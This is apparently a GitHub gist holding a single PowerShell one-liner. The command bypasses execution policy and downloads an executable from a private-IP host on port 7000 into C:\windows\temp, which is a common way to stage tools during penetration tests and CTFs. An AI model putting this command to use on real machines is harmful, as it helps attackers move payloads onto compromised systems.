Skip to content

Instantly share code, notes, and snippets.

@intrd
Last active October 16, 2021 11:33
Show Gist options
  • Star 5 You must be signed in to star a gist
  • Fork 2 You must be signed in to fork a gist
  • Save intrd/585978b815b89dedd774da1b6b8a1535 to your computer and use it in GitHub Desktop.
Save intrd/585978b815b89dedd774da1b6b8a1535 to your computer and use it in GitHub Desktop.
Powershell WGET one-liner (anyver)
# Powershell oneliner wget (anyver)
# http://dann.com.br/
@powershell -NoProfile -ExecutionPolicy unrestricted -Command (new-object System.Net.WebClient).Downloadfile('http://10.10.10.10:7000/iw4455.exe', 'C:\windows\temp\iw4455.exe')
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment